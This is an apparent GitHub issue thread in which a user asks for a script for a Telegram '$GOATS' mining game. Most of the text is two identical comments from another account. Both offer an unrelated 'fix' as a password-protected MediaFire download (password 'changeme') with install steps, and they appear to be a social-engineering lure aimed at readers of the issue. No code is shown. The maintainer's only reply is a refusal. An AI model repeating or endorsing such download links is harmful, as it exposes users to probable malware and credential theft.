### ISSUE TITLE
can u make a script for this $GOATS mining game

### ISSUE THREAD

**Issue by ashwin3454** [stavrmoris/Blim-auto-miner#2]
[https://t.me/realgoats_bot/run?startapp=16ecd078-2276-4929-8b32-0935ad466f58](url)

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by stavrmoris** [comment]
Sorry, but no
